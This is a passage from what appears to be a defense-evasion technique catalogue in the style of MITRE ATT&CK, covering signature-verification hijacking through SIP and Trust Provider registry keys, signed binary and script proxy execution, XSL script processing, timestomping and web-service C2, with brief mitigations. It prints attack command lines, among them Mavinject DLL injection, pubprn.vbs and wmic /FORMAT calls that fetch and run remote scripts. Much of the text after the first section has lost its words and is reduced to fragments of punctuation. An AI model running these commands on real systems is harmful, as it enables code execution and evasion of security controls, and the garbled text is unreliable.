Description: Attackers can modify the components of the signing architecture and verification of the digital signature of a Windows code in order to bypass the launch control tools that allow only signed code to be run. To create, sign, and verify the signature of files of various formats, Windows uses the so-called Subject Interface Package (SIP) —the software specifications that are unique for each file type, which ensure interaction between the API functions that initiate the creation, calculation and verification of signatures and directly files. The validity of the signature is confirmed by the so-called Trust Provider - these are the software components of the operating system that carry out various procedures related to the calculation and verification of digital signatures.

Popular attack methods:

• Modifying the DLL and FuncName keys in the CryptSIPDllGetSignedDataMsg section:
  HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllGetSignedDataMsg \ [SIP_GUID] .
  It is executed with the purpose of replacing a DLL library that provides the CryptSIPDllGetSignedDataMSG function, which returns a coded digital certificate from a signed file. A dummy function can always return a previously known valid signature value (for example, a Microsoft signature for executable system files) when using a modified SIP. The attacker may attempt to apply one valid signature to all files, however, this will most likely lead to the signature being invalid, since the hash returned by the function will not match the hash calculated from the file.
• Modification of DLL and FuncName keys in the section:
  HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllVerifyIndirectData / [SIP_GUID] .
  It is executed with the purpose of replacing the DLL library that provides the CryptSIPDllVerifyIndirectData function, which checks the hash calculated from the file with the hash specified in the digital signature and returns the result of the verification (True / False). , c SIP. , DLL-.
• DLL FuncName :
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy/[Trust Provider GUID] .
  DLL-, FinalPolicy Trust Provider, , . CryptSIPDllVerifyIndirectData, DLL-.

, Windows DLL (DLL Search Order Hijacking).

: , , SIP Trust Provider. SIP. DLL, , Windows AppLocker DeviceGuard.

(Scripting)

System: Windows, Linux, macOS
:
: , , , , . API . Office . , . — Metasploit, Veil, PowerSploit.

: , VBScript PowerShell. Windows MS Office GPO. , . , , Sandboxie Windows Apparmor, Docker Linux.

- (Signed Binary Proxy Execution)

System: Windows
:
: , , Windows, . Microsoft, Windows, :

• Mavinject.exe — Windows, . Mavinject DLL :
«C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe» [PID] /INJECTRUNNING [PATH DLL];
C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL];
• SyncAppvPublishingServer.exe — powershell- powershell.exe.
.

: , .

- (Signed Script Proxy Execution)

System: Windows
:
: , , , , PubPrn.vbs Microsoft :
cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

: , .

(Software Packing)

System: Windows
: , , . . — MPRESS UPS, , , , , . , .

: , , . - .

(Space after Filename)

System: Linux, macOS
:
: , . ( .app) . , Mach-O evil.bin, Terminal.app . evil.txt, . , «evil.txt » ( ), . .

: , .. , , , .

Timestomp

: Windows, Linux
: , , System
: Timestomp — (, , ). , , . , .

: - . .

(Trusted Developer Utilities)

System: Windows
:
: , , - . , .
• MSBulid — , Visual Studio. XML-, . MSBuild .NET 4 C# XML-, . MSBulid.exe Microsoft.
• DNX — .Net Execution Environmant (dnx.exe) (development kit) Visual Studio Enterprise. .NET Core CLI 2016 . DNX Windows .Net Core ASP.NET Core 1.0. Dnx.exe - .
• RCSI — C#, csi.exe. Roslyn .Net. Rcsi.exe Microsoft. C# .csx Rcsi.exe Windows.
• WinDbg/CDB — MS Windows user-mode. Microsoft cdb.exe user-mode. . , - Windows. WinDbg.exe CDB.exe Microsoft .
• Tracker — tracker.exe. .NET MSBuild. Windows 10. tracker.exe DLL . Tracker.exe Microsoft.

: , .

Valid Accounts

: , . , VPN, OWA, . , . .

: , . , , . SIEM-.

Web- (Web Service)

System: Windows
:
: , Web- . Command and control (&C 2). - C2, Google Twitter. . - SSL/TLS, .

: - . IDS/IPS-, , . , C2 , . .

XSL- (XSL Script Processing)

System: Windows
:
: Extensible Stylesheet Language (*.xsl), , XML-. XSL . , . (Trusted Developer Utilities), msxsl.exe, XML- (html, wml, rtf, pdf ..) JavaScript, ( URL-) XSL-. msxsl.exe , . msxsl.exe:
msxsl.exe customers[.]xml script[.]xsl .
, Squiblytwo, WMI JScript VBScript xsl-. , Squiblydoo, regsrv32.exe, Windows:
• : wmic process list /FORMAT:evil[.]xsl;
• : wmic os get /FORMAT:«https[:]//example[.]com/evil[.]xsl».

: msxsl.exe, . WMI , .